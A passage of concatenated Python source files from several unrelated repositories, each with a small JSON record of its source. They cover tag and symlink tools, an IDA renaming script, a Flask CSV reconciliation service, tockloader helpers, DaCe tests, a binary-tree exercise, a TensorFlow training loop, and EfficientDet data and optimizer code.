if matcher.search(line) >= 0:
(a, b), (a1, b1), (a2, b2) = matcher.regs[:3]
name = line[a2:b2]
pat = line[a:b]
tag = pat + '\177' + `lineno` + ',' + `charno` + '\n'
tags.append((name, tag))
size = size + len(tag)
charno = charno + len(line)
outfp.write('\f\n' + file + ',' + `size` + '\n')
for name, tag in tags:
outfp.write(tag)
main()
```
#### File: Tools/scripts/linktree.py
```python
import sys, os
LINK = '.LINK' # Name of special symlink at the top.
debug = 0
def main():
if not 3 <= len(sys.argv) <= 4:
print 'usage:', sys.argv[0], 'oldtree newtree [linkto]'
return 2
oldtree, newtree = sys.argv[1], sys.argv[2]
if len(sys.argv) > 3:
link = sys.argv[3]
link_may_fail = 1
else:
link = LINK
link_may_fail = 0
if not os.path.isdir(oldtree):
print oldtree + ': not a directory'
return 1
try:
os.mkdir(newtree, 0777)
except os.error, msg:
print newtree + ': cannot mkdir:', msg
return 1
linkname = os.path.join(newtree, link)
try:
os.symlink(os.path.join(os.pardir, oldtree), linkname)
except os.error, msg:
if not link_may_fail:
print linkname + ': cannot symlink:', msg
return 1
else:
print linkname + ': warning: cannot symlink:', msg
linknames(oldtree, newtree, link)
return 0
def linknames(old, new, link):
if debug: print 'linknames', (old, new, link)
try:
names = os.listdir(old)
except os.error, msg:
print old + ': warning: cannot listdir:', msg
return
for name in names:
if name not in (os.curdir, os.pardir):
oldname = os.path.join(old, name)
linkname = os.path.join(link, name)
newname = os.path.join(new, name)
if debug > 1: print oldname, newname, linkname
if os.path.isdir(oldname) and \
not os.path.islink(oldname):
try:
os.mkdir(newname, 0777)
ok = 1
except:
print newname + \
': warning: cannot mkdir:', msg
ok = 0
if ok:
linkname = os.path.join(os.pardir,
linkname)
linknames(oldname, newname, linkname)
else:
os.symlink(linkname, newname)
sys.exit(main())
``` |
{
"source": "1byte2bytes/nx-decomp-tools",
"score": 3
} |
#### File: 1byte2bytes/nx-decomp-tools/rename_functions_in_ida.py
```python
import csv
import idc
import os
from util import config
csv_path = config.get_functions_csv_path()
def can_overwrite_name(addr: int, new_name: str):
if not new_name or new_name.startswith(("sub_", "nullsub_", "j_")):
return False
old_name: str = idc.get_name(addr)
# If we don't have an existing name, then the function can always be renamed.
if not old_name:
return True
# Auto-generated names can be overwritten.
if old_name.startswith(("sub_", "nullsub_", "j_")):
return True
# If the existing name is mangled, then it probably came from the function list CSV
# so it can be overwritten.
if old_name.startswith("_Z"):
return True
# Prefer mangled names to temporary names.
if new_name.startswith("_Z"):
return True
# Otherwise, we return false to avoid losing temporary names.
return False
with open(csv_path, "r") as f:
reader = csv.reader(f)
# Skip headers
next(reader)
for fn in reader:
addr = int(fn[0], 16)
name = fn[3]
if can_overwrite_name(addr, name):
idc.set_name(addr, name, idc.SN_CHECK | idc.SN_NOWARN)
``` |
{
"source": "1-Byte/csv-reconcile",
"score": 2
} |
#### File: csv-reconcile/csv_reconcile/__init__.py
```python
from flask import Flask, request, jsonify
from flask_cors import cross_origin
from .score import processQueryBatch
from .extend import getCSVCols, processDataExtensionBatch
from . import initdb
from . import default_settings
from . import scorer
import json
import os.path
from contextlib import contextmanager
import time
import click
try:
from importlib import metadata
except:
import importlib_metadata as metadata
__version__ = '0.2.1'
#------------------------------------------------------------------
# Implement reconciliation API
# [[https://reconciliation-api.github.io/specs/latest/]]
#------------------------------------------------------------------
@contextmanager
def Timer():
t = time.perf_counter()
print("start timer", flush=True)
yield
elapsed = time.perf_counter() - t
print("Elapsed: %s" % (elapsed,))
# Default manifest. Can be overriden/updated in configuration
MANIFEST = {
"versions": ["0.1"],
"name": "CSV Reconcile",
"identifierSpace": "http://localhost/csv_reconcile/ids",
"schemaSpace": "http://localhost/csv_reconcile/schema",
"extend": {
"propose_properties": {
"service_url": "http://localhost:5000",
"service_path": "/properties"
}
}
}
def create_app(setup=None, config=None, instance_path=None):
app = Flask("csv-reconcile", instance_path=instance_path)
# Could make dbname configurable
# possibly better to roll THRESHOLD and LIMIT into one config called LIMITS
app.config.from_object(default_settings)
if config:
app.config.from_pyfile(config)
app.config.from_mapping(**setup)
scoreOptions = app.config['SCOREOPTIONS']
scorer.processScoreOptions(scoreOptions)
if 'MANIFEST' in app.config:
MANIFEST.update(app.config['MANIFEST'])
loglevel = app.config['LOGLEVEL']
if loglevel:
app.logger.setLevel(loglevel)
try:
os.makedirs(app.instance_path)
except OSError:
pass
@app.before_request
def before():
app.logger.debug(request.method)
app.logger.debug(request.headers)
@app.after_request
def after(response):
app.logger.debug(response.headers)
return response
@app.route('/reconcile', methods=['POST', 'GET'])
@cross_origin()
def acceptQuery():
threshold = app.config.get('THRESHOLD', None)
limit = app.config.get('LIMIT', None)
scoreOptions = app.config['SCOREOPTIONS']
queries = request.form.get('queries')
extend = request.form.get('extend')
if queries:
queryBatch = json.loads(queries)
app.logger.info(queryBatch)
with Timer():
ret = processQueryBatch(queryBatch,
limit=limit,
threshold=threshold,
**scoreOptions)
app.logger.info(ret)
return ret
elif extend:
extendBatch = json.loads(extend)
app.logger.info(extendBatch)
with Timer():
ret = processDataExtensionBatch(extendBatch)
app.logger.info(ret)
return ret
else:
return MANIFEST
# FIX FIX FIX... Not needed in OpenRefine 3.5
# [[https://github.com/OpenRefine/OpenRefine/issues/3672]]
def jsonpify(obj):
"""
Like jsonify but wraps result in a JSONP callback if a 'callback'
query param is supplied.
"""
try:
callback = request.args['callback']
response = app.make_response("%s(%s)" % (callback, json.dumps(obj)))
response.mimetype = "text/javascript"
return response
except KeyError:
return jsonify(obj)
@app.route('/properties', methods=['POST', 'GET'])
@cross_origin()
def acceptPropertyRequest():
# query string arg
propType = request.args.get('type')
# Type irrelevant, return all columns
if propType != None:
cols = getCSVCols()
ret = dict(properties=[{
'id': colname,
'name': name
} for name, colname in cols])
return jsonpify(ret)
# unprocessible request
return app
def pickScorer(plugin):
eps = metadata.entry_points()['csv_reconcile.scorers']
if len(eps) == 0:
raise RuntimeError("Please install a \"csv_reconcile.scorers\" plugin")
elif plugin:
for ep in eps:
if ep.name == plugin:
return ep
else:
raise RuntimeError(
"Please install %s \"csv_reconcile.scorers\" plugin" %
(plugin,))
elif len(eps) == 1:
return next(iter(eps))
# print out options
print(
"There are several scorers available. Please choose one of the following with the --scorer option."
)
for ep in eps:
print(" %s" % (ep.name,))
return None
@click.command()
@click.option('--config', help='config file')
@click.option('--scorer', 'scorerOption', help='scoring plugin to use')
@click.option('--init-db', is_flag=True, help='initialize the db')
@click.argument('csvfile')
@click.argument('idcol')
@click.argument('namecol')
def main(config, scorerOption, init_db, csvfile, idcol, namecol):
ep = pickScorer(scorerOption)
if ep:
ep.load()
else:
return
eps = metadata.entry_points()['csv_reconcile.scorers']
if len(eps) == 0:
raise RuntimeError("Please install a \"csv_reconcile.scorers\" plugin")
elif scorerOption:
for ep in eps:
if ep.name == scorerOption:
ep.load()
break
else:
raise RuntimeError(
"Please install %s \"csv_reconcile.scorers\" plugin" %
(scorerOption,))
elif len(eps) == 1:
ep = next(iter(eps))
ep.load()
else:
# prompt for options and quit
pass
app = create_app(dict(CSVFILE=csvfile, CSVCOLS=(idcol, namecol)), config)
if init_db:
with app.app_context():
initdb.init_db()
click.echo('Initialized the database.')
from werkzeug.serving import WSGIRequestHandler
WSGIRequestHandler.protocol_version = "HTTP/1.1"
app.run()
```
#### File: csv-reconcile/csv_reconcile/scorer.py
```python
def register(func):
'''
Decorator for replacing functions in this module
'''
glbls = globals()
glbls[func.__name__] = func
return func
def getNormalizedFields():
'''List of fields generated from reconciled column for the match calculation'''
raise RuntimeError('getNormalizedFields() -> tuple must be implemented')
def processScoreOptions(options):
'''Optionally modify configuration options passed in'''
def scoreMatch(left, right, **scoreOptions):
'''Score fuzzy match score between left and right'''
raise RuntimeError('scoreMatch(left,right) -> float must be implemented')
def normalizeWord(word, **scoreOptions):
'''
Preprocess column being reconciled for the match calculation.
Return a tuple with the same number of elements as returned by getNormalizedFields()
'''
raise RuntimeError(
'normalizeWord(word, **options) -> tuple must be implemented')
def normalizeRow(word, row, **scoreOptions):
'''
Preprocess column being reconciled against for the match calculation.
Return a tuple with the same number of elements as returned by getNormalizedFields()
Defaults to using the same normalization as normalizeWord().
'''
return normalizeWord(word, **scoreOptions)
def valid(normalizedFields):
'''Optionally validate column before performing match calculation'''
return True
``` |
{
"source": "1c3t3a/tockloader",
"score": 3
} |
#### File: tockloader/tockloader/helpers.py
```python
import argparse
import sys
import colorama
def set_terminal_title (title):
if sys.stdout.isatty():
sys.stdout.write(colorama.ansi.set_title(title))
sys.stdout.flush()
def set_terminal_title_from_port_info (info):
'''
Set a terminal title from a `pyserial` object.
'''
extras = ['Tockloader']
if info.manufacturer and info.manufacturer != 'n/a':
extras.append(info.manufacturer)
if info.name and info.name != 'n/a':
extras.append(info.name)
if info.description and info.description != 'n/a':
extras.append(info.description)
#if info.hwid and info.hwid != 'n/a':
# extras.append(info.hwid)
if info.product and info.product != 'n/a':
if info.product != info.description:
extras.append(info.product)
title = ' : '.join(extras)
set_terminal_title(title)
def set_terminal_title_from_port (port):
'''
Set the title of the user's terminal for Tockloader.
'''
set_terminal_title('Tockloader : {}'.format(port))
def menu (options, *, return_type, default_index=0, prompt='Which option? ', title=''):
'''
Present a menu of choices to a user
`options` should be a like-list object whose iterated objects can be coerced
into strings.
`return_type` must be set to one of
- "index" - for the index into the options array
- "value" - for the option value chosen
`default_index` is the index to present as the default value (what happens
if the user simply presses enter). Passing `None` disables default
selection.
'''
prompt_to_show = prompt
print(title)
for i,opt in enumerate(options):
print('[{}]\t{}'.format(i, opt))
if default_index is not None:
prompt_to_show += '[{}] '.format(default_index)
print()
resp = input(prompt_to_show)
if resp == '':
resp = default_index
else:
try:
resp = int(resp)
if resp < 0 or resp >= len(options):
raise ValueError
except:
return menu(options,
return_type=return_type,
default_index=default_index,
prompt=prompt,
title=title)
if return_type == 'index':
return resp
elif return_type == 'value':
return options[resp]
else:
raise NotImplementedError('Menu caller asked for bad return_type')
def plural (value):
'''
Return '' or 's' based on whether the `value` means a string should have
a plural word.
`value` can be a list or a number. If the number or the length of the list
is 1, then '' will be returned. Otherwise 's'.
'''
try:
value = len(value)
except:
pass
if value == 1:
return ''
else:
return 's'
def text_in_box (string, box_width):
'''
Return a string like:
```
┌───────────────┐
│ str │
└───────────────┘
```
'''
string_len = box_width - 4
truncated_str = (string[:string_len-3] + '...') if len(string) > string_len else string
out = '┌{}┐\n'.format('─'*(box_width-2))
out += '│ {} |\n'.format(truncated_str.ljust(string_len))
out += '└{}┘'.format('─'*(box_width-2))
return out
class ListToDictAction(argparse.Action):
'''
`argparse` action to convert `[['key', 'val'], ['key2', 'val2']]` to
`{'key': 'val', 'key2': 'val2'}`.
This will also do the following conversions:
- `[[]]` -> `{}`
- `[['k': 'v'], []]` -> `{'k': 'v'}`
- `[['k': 'v'], ['']]` -> `{'k': 'v'}`
- `[['k': 'v'], ['a']]` -> `{'k': 'v', 'a': ''}`
'''
def __call__(self, parser, namespace, values, option_string=None):
# Remove any empty values.
values = list(filter(None, values))
values = list(filter(lambda x: len(x[0]), values))
# Correct any bad values.
for item in values:
print(item)
if len(item) == 1:
item.append('')
elif len(item) > 2:
item = item[0:2]
# Convert to dict and set as argument attribute.
setattr(namespace, self.dest, dict(values))
``` |
{
"source": "1C4nfaN/dace",
"score": 2
} |
#### File: dace/tests/symbol_in_tasklet_test.py
```python
import dace
import numpy as np
value = dace.symbol('value', dtype=dace.float32)
@dace.program
def symintasklet_numpy(out: dace.float32[1]):
out[0] = value
@dace.program
def symintasklet_explicit(out: dace.float32[1]):
with dace.tasklet:
o = value
o >> out[0]
def test_numpy():
out = np.zeros(1).astype(np.float32)
symintasklet_numpy(out, value=np.float32(1.5))
assert out[0] == np.float32(1.5)
def test_explicit():
out = np.zeros(1).astype(np.float32)
symintasklet_explicit(out, value=np.float32(1.5))
assert out[0] == np.float32(1.5)
if __name__ == '__main__':
test_numpy()
test_explicit()
```
#### File: transformations/subgraph_fusion/create_out_transient_test.py
```python
import dace
from dace.transformation.subgraph import MultiExpansion
from dace.transformation.subgraph import SubgraphFusion
from dace.transformation.subgraph import ReduceExpansion
import dace.transformation.subgraph.helpers as helpers
import dace.sdfg.nodes as nodes
import numpy as np
from dace.sdfg.graph import SubgraphView
from dace.transformation.interstate import StateFusion
from typing import List, Union
import sys
def fusion(sdfg: dace.SDFG,
graph: dace.SDFGState,
subgraph: Union[SubgraphView, List[SubgraphView]] = None,
**kwargs):
subgraph = graph if not subgraph else subgraph
if not isinstance(subgraph, List):
subgraph = [subgraph]
map_fusion = SubgraphFusion()
for (property, val) in kwargs.items():
setattr(map_fusion, property, val)
for sg in subgraph:
map_entries = helpers.get_highest_scope_maps(sdfg, graph, sg)
# remove map_entries and their corresponding exits from the subgraph
# already before applying transformation
if isinstance(sg, SubgraphView):
for map_entry in map_entries:
sg.nodes().remove(map_entry)
if graph.exit_node(map_entry) in sg.nodes():
sg.nodes().remove(graph.exit_node(map_entry))
print(f"Subgraph Fusion on map entries {map_entries}")
map_fusion.fuse(sdfg, graph, map_entries)
if isinstance(sg, SubgraphView):
sg.nodes().append(map_fusion._global_map_entry)
N, M, O = [dace.symbol(s) for s in ['N', 'M', 'O']]
N.set(50)
M.set(60)
O.set(70)
@dace.program
def test_program(A: dace.float64[M, N], B: dace.float64[M, N], C: dace.float64[M, N]):
for i, j in dace.map[0:M, 0:N]:
with dace.tasklet:
in1 << A[i, j]
out1 >> A[i, j]
out1 = in1 + 1.0
with dace.tasklet:
in1 << A[:]
out1 >> B[:]
out1 = in1
for i, j in dace.map[0:M, 0:N]:
with dace.tasklet:
in1 << A[i, j]
out >> A[i, j]
out = in1 + 2.0
with dace.tasklet:
in1 << A[:]
out1 >> C[:]
out1 = in1
def test_quantitatively(sdfg, graph):
A = np.random.rand(M.get(), N.get()).astype(np.float64)
B1 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
C1 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
B2 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
C2 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
csdfg = sdfg.compile()
csdfg(A=A, B=B1, C=C1, N=N, M=M)
fusion(sdfg, graph)
csdfg = sdfg.compile()
csdfg(A=A, B=B2, C=C2, N=N, M=M)
assert np.allclose(B1, B2)
assert np.allclose(C1, C2)
def test_out_transient():
sdfg = test_program.to_sdfg()
sdfg.apply_transformations_repeated(StateFusion)
graph = sdfg.nodes()[0]
test_quantitatively(sdfg, graph)
if __name__ == "__main__":
test_out_transient()
``` |
{
"source": "1carlosd1/daa_2021_1",
"score": 3
} |
#### File: daa_2021_1/Tarea10/RecorridoArbol.py
```python
class NodoArbol:
def __init__(self,value,left=None,rigth=None):
self.data=value
self.left=left
self.rigth=rigth
self.ban=0
def recorrido(arb):
mov=[]
bandera=0
lis1=[]#Nodos hoja
lis2=[]#niveles
while bandera==0:
bandera2=0
aux=arb
for i in mov:
if i=="L":
aux=aux.left
if i=="R":
aux=aux.rigth
if len(mov)==0 and arb.left.ban==1 and arb.rigth.ban==1:
bandera=1
if len(mov)==0 and arb.left==None and arb.rigth==None:
bandera=1
if aux.left!= None and aux.left.ban==0 and bandera2==0:
aux=aux.left
aux.ban=1
mov.append("L")
bandera2=1
if aux.rigth!=None and aux.rigth.ban==0 and bandera2==0:
aux=aux.rigth
aux.ban=1
mov.append("R")
bandera2=1
if aux.rigth==None and aux.left==None:
lis1.append(aux.data)
lis2.append(len(mov))
mov.pop()
if aux.left!=None and aux.rigth!=None and aux!=arb:
if aux.left.ban==1 and aux.rigth.ban==1:
mov.pop()
if aux.rigth!=None:
if aux.left==None and aux.rigth.ban==1:
mov.pop()
if aux.left!=None:
if aux.left.ban==1 and aux.rigth==None:
mov.pop()
for i in range(len(lis2)-1):
for j in range(i):
if lis2[j]>lis2[j+1]:
aux=lis1[j]
lis1[j]=lis1[j+1]
lis1[j+1]=aux
aux2=lis2[j]
lis2[j]=lis2[j+1]
lis2[j+1]=aux2
print("----------------------------------------------------------------")
for i in range(len(lis2)):
if lis2[i]==lis2[len(lis2)-1]:
print("Nodo",lis1[i],"en el nivel",lis2[i])
print("----------------------------------------------------------------")
print("***********ArboL Uno**********")
arbol=NodoArbol("4",NodoArbol("2",NodoArbol("1"),NodoArbol("3")),NodoArbol("8",NodoArbol("9")))
recorrido(arbol)
print("**********Arbol dos **********")
arbol2=NodoArbol("A",NodoArbol("D",NodoArbol("L"),NodoArbol("K")),NodoArbol("M",NodoArbol("I"),NodoArbol("E")))
recorrido(arbol2)
print("**********Arbol Tres**********")
arbol3=NodoArbol("2",NodoArbol("7",NodoArbol("2"),NodoArbol("6",NodoArbol("5"),NodoArbol("11"))),NodoArbol("5",None,NodoArbol("9",NodoArbol("4"))))
recorrido(arbol3)
print("**********Arbol Cuatro**********")
arbol4=NodoArbol("55",NodoArbol("53",NodoArbol("48",NodoArbol(None,NodoArbol("51"))),NodoArbol("54")),NodoArbol("59",NodoArbol("56",NodoArbol(None,NodoArbol("57"))),NodoArbol("63",NodoArbol("61"),NodoArbol("70"))))
recorrido(arbol4)
``` |
{
"source": "1carvercoleman/column_carver",
"score": 3
} |
#### File: 1carvercoleman/column_carver/column_carver_pixeler.py
```python
import os
import skimage
import numpy as np
import cv2
from glob import glob
import matplotlib.pyplot as plt
import pandas as pd
DEBUG = True
os.chdir("PATH_TO_IMAGES")
path = ("PATH_TO_OUTPUT_FOLDER")
# Calculates mean pixels on each verticle
def column_cropper(img):
IMG_WIDTH = img.shape[:2][1]
IMG_HEIGHT = img.shape[:2][0]
col_mean = []
crops = []
final_crops = []
cut_begin = 'y'
for i in range(IMG_WIDTH):
intermediate_sum = 0
for j in range(IMG_HEIGHT):
intermediate_sum = intermediate_sum + img[j,i][0]
col_mean.append(intermediate_sum / IMG_HEIGHT)
if i > 3 and col_mean[i - 5] > 250.0 and max(col_mean[-4:]) < 250 and cut_begin == 'y':
crops.append(i - 5)
cut_begin = 'n'
if i > 3 and col_mean[i] - col_mean[i - 3] > 20 and cut_begin == 'n' and col_mean[i] > 250.0:
crops.append(i)
cut_begin = 'y'
final_crops.append(crops)
crops = []
return (final_crops, col_mean)
# Plots time series of panda data frame
def plot_df(df, x, y, title="", xlabel='Pixel Index', ylabel='Pixel Value', dpi=100):
plt.figure(figsize=(16,5), dpi=dpi)
plt.plot(x, y, color='tab:red')
plt.gca().set(title=title, xlabel=xlabel, ylabel=ylabel)
plt.show()
# __main__
for image_file in glob(f'*.jpg'):
print(image_file)
gray = cv2.imread(image_file)
thresh, gray2 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)
final_crops, col_mean = column_cropper(gray2)
final_crops = np.asarray(final_crops)
for i in range(len(final_crops)):
if i == (len(final_crops) - 1):
buffer_right = -5
else:
buffer_right = 7
cropped = gray2[:,final_crops[i][0]:final_crops[i][1] - buffer_right]
skimage.io.imsave(path + image_file[:-4] + '_col_' + str(i + 1) + '.jpg', cropped)
if DEBUG:
#Plots pixels across image
df = pd.DataFrame(col_mean)
df.index.name = 'Pixel Index'
df.reset_index(inplace=True)
df.columns = ['Pixel Index', 'Pixel Value']
plot_df(df, df['Pixel Index'], df['Pixel Value'])
``` |
{
"source": "1cgeo/proxySetter",
"score": 2
} |
#### File: 1cgeo/proxySetter/main.py
```python
import os, sys
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from controllers.proxyCtrl import ProxyCtrl
class Main:
def __init__(
self,
iface,
proxyCtrl=ProxyCtrl()
):
self.iface = iface
self.proxyCtrl = proxyCtrl
self.proxyComboBox = None
def initGui(self):
self.proxyComboBox = self.iface.addToolBarWidget(
self.proxyCtrl.getProxyComboWidget()
)
def unload(self):
self.iface.removeToolBarIcon(self.proxyComboBox) if self.proxyComboBox else ''
del self.comboBox
``` |
{
"source": "1chimaruGin/custom_train_loop",
"score": 3
} |
#### File: custom_train_loop/custom_train_loop/custom_training_loop.py
```python
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.datasets import mnist
import tensorflow_datasets as tfds
physical_devices = tf.config.experimental.list_physical_devices("GPU")
tf.config.experimental.set_memory_growth(physical_devices[0], True)
(ds_train, ds_test), ds_info = tfds.load(
"mnist",
split=["train", "test"],
shuffle_files=True,
as_supervised=True,
with_info=True,
)
def normalized(image, label):
return tf.cast(image, tf.float32) / 255.0, label
def train(ds_train, ds_test):
AUTOTUNE = tf.data.experimental.AUTOTUNE
BATCH_SIZE = 128
ds_train = (
ds_train.map(normalized, num_parallel_calls=AUTOTUNE)
.cache()
.shuffle(ds_info.splits["train"].num_examples)
)
ds_train = ds_train.batch(BATCH_SIZE)
ds_train = ds_train.prefetch(AUTOTUNE)
ds_test = ds_test.map(normalized, num_parallel_calls=AUTOTUNE)
ds_test = ds_test.batch(BATCH_SIZE)
ds_test = ds_test.prefetch(AUTOTUNE)
model = keras.Sequential(
[
layers.Input((28, 28, 1)),
layers.Conv2D(32, 3, activation="relu"),
layers.Flatten(),
layers.Dense(10, activation="softmax"),
]
)
num_epochs = 5
optimizer = keras.optimizers.Adam()
loss_fn = keras.losses.SparseCategoricalCrossentropy()
acc_metric = keras.metrics.SparseCategoricalAccuracy()
for epoch in range(num_epochs):
print(f"\nStart Training Epoch: {epoch}")
for batch_idx, (x_batch, y_batch) in enumerate(ds_train):
with tf.GradientTape() as tape:
y_pred = model(x_batch, training=True)
loss = loss_fn(y_batch, y_pred)
gradients = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(gradients, model.trainable_weights))
acc_metric.update_state(y_batch, y_pred)
train_acc = acc_metric.result()
print(f"Accuracy over epoch {train_acc}")
acc_metric.reset_states()
for batch_idx, (x_batch, y_batch) in enumerate(ds_test):
y_pred = model(x_batch, training=False)
acc_metric.update_state(y_batch, y_pred)
test_acc = acc_metric.result()
print(f"Accuracy over test set: {test_acc}")
acc_metric.reset_states()
if __name__ == '__main__':
train(ds_train, ds_test)
``` |
{
"source": "1chimaruGin/EfficientDet",
"score": 2
} |
#### File: EfficientDet/data/dataset.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch.utils.data as data
import os
import cv2
import random
import torch
import numpy as np
from PIL import Image
from pycocotools.coco import COCO
class CocoDetection(data.Dataset):
"""`MS Coco Detection <http://mscoco.org/dataset/#detections-challenge2016>`_ Dataset.
Args:
root (string): Root directory where images are downloaded to.
ann_file (string): Path to json annotation file.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.ToTensor``
"""
def __init__(self, root, ann_file, transform=None):
super(CocoDetection, self).__init__()
if isinstance(root, torch._six.string_classes):
root = os.path.expanduser(root)
self.root = root
self.transform = transform
self.yxyx = True # expected for TF model, most PT are xyxy
self.include_masks = False
self.include_bboxes_ignore = False
self.has_annotations = 'image_info' not in ann_file
self.coco = None
self.cat_ids = []
self.cat_to_label = dict()
self.img_ids = []
self.img_ids_invalid = []
self.img_infos = []
self._load_annotations(ann_file)
def _load_annotations(self, ann_file):
assert self.coco is None
self.coco = COCO(ann_file)
self.cat_ids = self.coco.getCatIds()
img_ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
for img_id in sorted(self.coco.imgs.keys()):
info = self.coco.loadImgs([img_id])[0]
valid_annotation = not self.has_annotations or img_id in img_ids_with_ann
if valid_annotation and min(info['width'], info['height']) >= 32:
self.img_ids.append(img_id)
self.img_infos.append(info)
else:
self.img_ids_invalid.append(img_id)
def _parse_img_ann(self, img_id, img_info):
ann_ids = self.coco.getAnnIds(imgIds=[img_id])
ann_info = self.coco.loadAnns(ann_ids)
bboxes = []
bboxes_ignore = []
cls = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
if self.include_masks and ann['area'] <= 0:
continue
if w < 1 or h < 1:
continue
# To subtract 1 or not, TF doesn't appear to do this so will keep it out for now.
if self.yxyx:
#bbox = [y1, x1, y1 + h - 1, x1 + w - 1]
bbox = [y1, x1, y1 + h, x1 + w]
else:
#bbox = [x1, y1, x1 + w - 1, y1 + h - 1]
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
if self.include_bboxes_ignore:
bboxes_ignore.append(bbox)
else:
bboxes.append(bbox)
cls.append(self.cat_to_label[ann['category_id']] if self.cat_to_label else ann['category_id'])
if bboxes:
bboxes = np.array(bboxes, dtype=np.float32)
cls = np.array(cls, dtype=np.int64)
else:
bboxes = np.zeros((0, 4), dtype=np.float32)
cls = np.array([], dtype=np.int64)
if self.include_bboxes_ignore:
if bboxes_ignore:
bboxes_ignore = np.array(bboxes_ignore, dtype=np.float32)
else:
bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
ann = dict(img_id=img_id, bbox=bboxes, cls=cls, img_size=(img_info['width'], img_info['height']))
if self.include_bboxes_ignore:
ann['bbox_ignore'] = bboxes_ignore
return ann
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: Tuple (image, annotations (target)).
"""
img_id = self.img_ids[index]
img_info = self.img_infos[index]
if self.has_annotations:
ann = self._parse_img_ann(img_id, img_info)
else:
ann = dict(img_id=img_id, img_size=(img_info['width'], img_info['height']))
path = img_info['file_name']
img = Image.open(os.path.join(self.root, path)).convert('RGB')
if self.transform is not None:
img, ann = self.transform(img, ann)
return img, ann
def __len__(self):
return len(self.img_ids)
class Custom_Dataset(data.Dataset):
def __init__(self, root, data, image_ids, transform=None, test=False):
self.root = root
self.data = data
self.image_ids = image_ids
self.transform = transform
self.test = test
def _load_data(self, index):
image_id = self.image_ids[index]
image = cv2.imread(f'{self.root}/{image_id}.jpg', cv2.IMREAD_COLOR)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)
image /= 255.0
record = self.data[self.data['image_id'] == image_id]
boxes = record[['x', 'y', 'w', 'h']].values
boxes[:, 2] = boxes[:, 0] + boxes[:, 2]
boxes[:, 3] = boxes[:, 1] + boxes[:, 3]
return image, boxes
def _load_cutmix_data(self, index, imgsize=1024):
w, h = imgsize, imgsize
s = imgsize // 2
xc, yc = [int(random.uniform(imgsize * .25, imgsize * .75)) for _ in range(2)]
indexes = [index] + [random.randint(0, self.image_ids.shape[0] - 1) for _ in range(3)]
result_image = np.full((imgsize, imgsize, 3), 1, dtype=np.float32)
result_boxes = []
for i, index in enumerate(indexes):
image, boxes = self._load_data(index)
if i == 0:
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
result_image[y1a:y2a, x1a:x2a] = image[y1b:y2b, x1b:x2b]
padw = x1a - x1b
padh = y1a - y1b
boxes[:, 0] += padw
boxes[:, 1] += padh
boxes[:, 2] += padw
boxes[:, 3] += padh
result_boxes.append(boxes)
result_boxes = np.concatenate(result_boxes, 0)
np.clip(result_boxes[:, 0:], 0, 2 * s, out=result_boxes[:, 0:])
result_boxes = result_boxes.astype(np.int32)
result_boxes = result_boxes[np.where((result_boxes[:, 2] - result_boxes[:, 0]) * (result_boxes[:, 3] - result_boxes[:, 1]) > 0)]
return result_image, result_boxes
def __getitem__(self, index: int):
image_id = self.image_ids[index]
if self.test or random.random() > 0.35:
image, boxes = self._load_data(index)
elif random.random() > 0.5:
image, boxes = self._load_cutmix_data(index)
else:
image, boxes = self._load_cutmix_data(index)
labels = torch.ones((boxes.shape[0]), dtype=torch.int64)
target = {}
target['boxes'] = boxes
target['labels'] = labels
target['image_id'] = torch.tensor(index)
if self.transform:
for i in range(10):
sample = self.transform(**{
'image': image,
'bboxes': target['boxes'],
'labels': labels
})
if len(sample['bboxes']) > 0:
image = sample['image']
target['boxes'] = torch.stack(tuple(map(torch.tensor, zip(*sample['bboxes'])))).permute(1, 0)
target['boxes'][:, [0, 1, 2, 3]] = target['boxes'][:, [1, 0, 3, 2]]
break
return image, target, image_id
def __len__(self) -> int:
return self.image_ids.shape[0]
```
#### File: timm/optim/optim_factory.py
```python
import torch
from torch import optim as optim
from timm.optim import Nadam, RMSpropTF, AdamW, RAdam, NovoGrad, NvNovoGrad, Lookahead, AdamP, SGDP
try:
from apex.optimizers import FusedNovoGrad, FusedAdam, FusedLAMB, FusedSGD
has_apex = True
print(True)
except ImportError:
has_apex = False
def add_weight_decay(model, weight_decay=1e-5, skip_list=()):
decay = []
no_decay = []
for name, param in model.named_parameters():
if not param.requires_grad:
continue # frozen weights
if len(param.shape) == 1 or name.endswith(".bias") or name in skip_list:
no_decay.append(param)
else:
decay.append(param)
return [
{'params': no_decay, 'weight_decay': 0.},
{'params': decay, 'weight_decay': weight_decay}]
def create_optimizer(args, model, filter_bias_and_bn=True):
opt_lower = args.opt.lower()
weight_decay = args.weight_decay
if 'adamw' in opt_lower or 'radam' in opt_lower:
# Compensate for the way current AdamW and RAdam optimizers apply LR to the weight-decay
# I don't believe they follow the paper or original Torch7 impl which schedules weight
# decay based on the ratio of current_lr/initial_lr
weight_decay /= args.lr
if weight_decay and filter_bias_and_bn:
parameters = add_weight_decay(model, weight_decay)
weight_decay = 0.
